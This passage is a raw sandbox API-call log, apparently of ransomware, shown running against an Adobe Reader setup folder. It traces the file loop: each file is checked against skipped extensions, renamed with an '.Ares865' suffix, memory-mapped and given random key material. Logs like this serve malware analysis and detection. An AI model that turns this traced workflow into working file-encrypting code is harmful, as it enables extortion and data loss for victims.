lstrlenW (lpString=".ini") returned 4 [0154.752] lstrcmpiW (lpString1="1055.mst", lpString2=".ini") returned 1 [0154.752] lstrlenW (lpString=".sys") returned 4 [0154.752] lstrcmpiW (lpString1="1055.mst", lpString2=".sys") returned 1 [0154.752] lstrlenW (lpString="1055.mst") returned 8 [0154.753] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1055.mst.Ares865") returned 108 [0154.753] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1055.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1055.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1055.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1055.mst.ares865"), dwFlags=0x1) returned 1 [0154.754] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1055.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1055.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.754] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=37376) returned 1 [0154.754] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.755] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.755] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.755] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.756] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9500, lpName=0x0) returned 0x170 [0154.757] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9500) returned 0x190000 [0154.759] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.760] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.760] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.760] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.761] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1058.mst" | out: lpString1="1058.mst") returned="1058.mst" [0154.761] lstrlenW (lpString="1058.mst") returned 8 [0154.761] lstrlenW (lpString="Ares865") returned 7 [0154.761] lstrcmpiW (lpString1="058.mst", lpString2="Ares865") returned -1 [0154.761] lstrlenW (lpString=".dll") returned 4 [0154.761] lstrcmpiW (lpString1="1058.mst", lpString2=".dll") returned 1 [0154.761] lstrlenW (lpString=".lnk") returned 4 [0154.761] lstrcmpiW (lpString1="1058.mst", lpString2=".lnk") returned 1 [0154.761] lstrlenW (lpString=".ini") returned 4 [0154.761] lstrcmpiW (lpString1="1058.mst", lpString2=".ini") returned 1 [0154.761] lstrlenW (lpString=".sys") returned 4 [0154.761] lstrcmpiW (lpString1="1058.mst", lpString2=".sys") returned 1 [0154.762] lstrlenW (lpString="1058.mst") returned 8 [0154.762] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1058.mst.Ares865") returned 108 [0154.762] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1058.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1058.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1058.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1058.mst.ares865"), dwFlags=0x1) returned 1 [0154.764] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1058.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1058.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.764] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=37376) returned 1 [0154.764] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.764] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.764] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.764] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.765] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.765] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.765] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9500, lpName=0x0) returned 0x170 [0154.766] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9500) returned 0x190000 [0154.769] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.769] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.769] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.769] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.771] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1060.mst" | out: lpString1="1060.mst") returned="1060.mst" [0154.771] lstrlenW (lpString="1060.mst") returned 8 [0154.771] lstrlenW (lpString="Ares865") returned 7 [0154.771] lstrcmpiW (lpString1="060.mst", lpString2="Ares865") returned -1 [0154.771] lstrlenW (lpString=".dll") returned 4 [0154.771] lstrcmpiW (lpString1="1060.mst", lpString2=".dll") returned 1 [0154.771] lstrlenW (lpString=".lnk") returned 4 [0154.771] lstrcmpiW (lpString1="1060.mst", lpString2=".lnk") returned 1 [0154.771] lstrlenW (lpString=".ini") returned 4 [0154.771] lstrcmpiW (lpString1="1060.mst", lpString2=".ini") returned 1 [0154.771] lstrlenW (lpString=".sys") returned 4 [0154.771] lstrcmpiW (lpString1="1060.mst", lpString2=".sys") returned 1 [0154.771] lstrlenW (lpString="1060.mst") returned 8 [0154.771] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1060.mst.Ares865") returned 108 [0154.771] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1060.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1060.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1060.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1060.mst.ares865"), dwFlags=0x1) returned 1 [0154.775] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1060.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1060.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.775] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=38400) returned 1 [0154.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.776] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.776] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.776] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.776] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9900, lpName=0x0) returned 0x170 [0154.778] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9900) returned 0x190000 [0154.781] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.782] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.782] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.782] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.783] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1069.mst" | out: lpString1="1069.mst") returned="1069.mst" [0154.783] lstrlenW (lpString="1069.mst") returned 8 [0154.783] lstrlenW (lpString="Ares865") returned 7 [0154.783] lstrcmpiW (lpString1="069.mst", lpString2="Ares865") returned -1 [0154.783] lstrlenW (lpString=".dll") returned 4 [0154.783] lstrcmpiW (lpString1="1069.mst", lpString2=".dll") returned 1 [0154.783] lstrlenW (lpString=".lnk") returned 4 [0154.783] lstrcmpiW (lpString1="1069.mst", lpString2=".lnk") returned 1 [0154.783] lstrlenW (lpString=".ini") returned 4 [0154.783] lstrcmpiW (lpString1="1069.mst", lpString2=".ini") returned 1 [0154.783] lstrlenW (lpString=".sys") returned 4 [0154.783] lstrcmpiW (lpString1="1069.mst", lpString2=".sys") returned 1 [0154.783] lstrlenW (lpString="1069.mst") returned 8 [0154.784] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1069.mst.Ares865") returned 108 [0154.784] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1069.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1069.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1069.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1069.mst.ares865"), dwFlags=0x1) returned 1 [0154.785] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1069.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1069.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.786] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=40448) returned 1 [0154.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.786] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.787] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.787] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.787] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa100, lpName=0x0) returned 0x170 [0154.788] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa100) returned 0x190000 [0154.790] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.791] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.791] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.791] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.792] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="2052.mst" | out: lpString1="2052.mst") returned="2052.mst" [0154.792] lstrlenW (lpString="2052.mst") returned 8 [0154.792] lstrlenW (lpString="Ares865") returned 7 [0154.792] lstrcmpiW (lpString1="052.mst", lpString2="Ares865") returned -1 [0154.792] lstrlenW (lpString=".dll") returned 4 [0154.792] lstrcmpiW (lpString1="2052.mst", lpString2=".dll") returned 1 [0154.792] lstrlenW (lpString=".lnk") returned 4 [0154.792] lstrcmpiW (lpString1="2052.mst", lpString2=".lnk") returned 1 [0154.793] lstrlenW (lpString=".ini") returned 4 [0154.793] lstrcmpiW (lpString1="2052.mst", lpString2=".ini") returned 1 [0154.793] lstrlenW (lpString=".sys") returned 4 [0154.793] lstrcmpiW (lpString1="2052.mst", lpString2=".sys") returned 1 [0154.793] lstrlenW (lpString="2052.mst") returned 8 [0154.793] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\2052.mst.Ares865") returned 108 [0154.793] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\2052.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\2052.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\2052.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\2052.mst.ares865"), dwFlags=0x1) returned 1 [0154.795] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\2052.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\2052.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.795] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=35840) returned 1 [0154.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.795] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.796] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.796] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.796] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8f00, lpName=0x0) returned 0x170 [0154.798] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8f00) returned 0x190000 [0154.800] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.800] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.800] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.801] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.802] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="ABCPY.INI" | out: lpString1="ABCPY.INI") returned="ABCPY.INI" [0154.802] lstrlenW (lpString="ABCPY.INI") returned 9 [0154.802] lstrlenW (lpString="Ares865") returned 7 [0154.802] lstrcmpiW (lpString1="CPY.INI", lpString2="Ares865") returned 1 [0154.802] lstrlenW (lpString=".dll") returned 4 [0154.802] lstrcmpiW (lpString1="ABCPY.INI", lpString2=".dll") returned 1 [0154.802] lstrlenW (lpString=".lnk") returned 4 [0154.802] lstrcmpiW (lpString1="ABCPY.INI", lpString2=".lnk") returned 1 [0154.802] lstrlenW (lpString=".ini") returned 4 [0154.802] lstrcmpiW (lpString1="ABCPY.INI", lpString2=".ini") returned 1 [0154.802] lstrlenW (lpString=".sys") returned 4 [0154.802] lstrcmpiW (lpString1="ABCPY.INI", lpString2=".sys") returned 1 [0154.802] lstrlenW (lpString="ABCPY.INI") returned 9 [0154.802] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\ABCPY.INI.Ares865") returned 109 [0154.802] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\ABCPY.INI" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\abcpy.ini"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\ABCPY.INI.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\abcpy.ini.ares865"), dwFlags=0x1) returned 1 [0154.804] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\ABCPY.INI.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\abcpy.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.804] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1729) returned 1 [0154.804] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.804] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.805] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.805] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.805] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.805] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.806] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9d0, lpName=0x0) returned 0x170 [0154.807] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9d0) returned 0x190000 [0154.808] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.808] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.808] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.809] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="AcroRead.msi" | out: lpString1="AcroRead.msi") returned="AcroRead.msi" [0154.809] lstrlenW (lpString="AcroRead.msi") returned 12 [0154.809] lstrlenW (lpString="Ares865") returned 7 [0154.809] lstrcmpiW (lpString1="ead.msi", lpString2="Ares865") returned 1 [0154.809] lstrlenW (lpString=".dll") returned 4 [0154.809] lstrcmpiW (lpString1="AcroRead.msi", lpString2=".dll") returned 1 [0154.809] lstrlenW (lpString=".lnk") returned 4 [0154.809] lstrcmpiW (lpString1="AcroRead.msi", lpString2=".lnk") returned 1 [0154.809] lstrlenW (lpString=".ini") returned 4 [0154.809] lstrcmpiW (lpString1="AcroRead.msi", lpString2=".ini") returned 1 [0154.809] lstrlenW (lpString=".sys") returned 4 [0154.809] lstrcmpiW (lpString1="AcroRead.msi", lpString2=".sys") returned 1 [0154.809] lstrlenW (lpString="AcroRead.msi") returned 12 [0154.810] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\AcroRead.msi.Ares865") returned 112 [0154.810] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\AcroRead.msi" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\acroread.msi"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\AcroRead.msi.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\acroread.msi.ares865"), dwFlags=0x1) returned 1 [0154.811] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\AcroRead.msi.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\acroread.msi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.812] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2523136) returned 1 [0154.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.812] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.813] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.813] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.927] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.928] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.928] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.941] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="Data1.cab" | out: lpString1="Data1.cab") returned="Data1.cab" [0154.941] lstrlenW (lpString="Data1.cab") returned 9 [0154.941] lstrlenW (lpString="Ares865") returned 7 [0154.941] lstrcmpiW (lpString1="ta1.cab", lpString2="Ares865") returned 1 [0154.941] lstrlenW (lpString=".dll") returned 4 [0154.941] lstrcmpiW (lpString1="Data1.cab", lpString2=".dll") returned 1 [0154.941] lstrlenW (lpString=".lnk") returned 4 [0154.941] lstrcmpiW (lpString1="Data1.cab", lpString2=".lnk") returned 1 [0154.941] lstrlenW (lpString=".ini") returned 4 [0154.941] lstrcmpiW (lpString1="Data1.cab", lpString2=".ini") returned 1 [0154.941] lstrlenW (lpString=".sys") returned 4 [0154.941] lstrcmpiW (lpString1="Data1.cab", lpString2=".sys") returned 1 [0154.941] lstrlenW (lpString="Data1.cab") returned 9 [0154.941] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Data1.cab.Ares865") returned 109 [0154.941] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 